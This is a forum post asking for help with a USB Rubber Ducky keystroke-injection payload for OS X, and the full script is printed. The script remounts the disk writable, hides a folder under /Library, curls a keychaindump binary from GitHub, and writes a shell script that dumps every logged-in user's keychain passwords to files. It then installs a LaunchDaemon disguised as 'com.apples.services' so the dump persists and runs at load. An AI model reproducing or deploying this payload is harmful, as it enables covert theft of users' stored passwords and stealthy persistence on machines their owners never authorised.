IsaiahJTurner Posted May 30, 2014 Share Posted May 30, 2014 (edited) I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I wan't it to run automatically as soon as the user logs in. Any help? Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor REM Isaiah Turner REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login. REM Please do not use this for evil, this is for educational purposes only. REM http://isaiahjturner.com DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/sh ENTER STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump' ENTER STRING chmod +x /Library/.hidden/keychaindump ENTER STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc ENTER STRING do ENTER STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2) ENTER STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt ENTER STRING done' > /Library/.hidden/dump.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/dump.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/dump.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist Edited May 30, 2014 by IsaiahJTurner Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.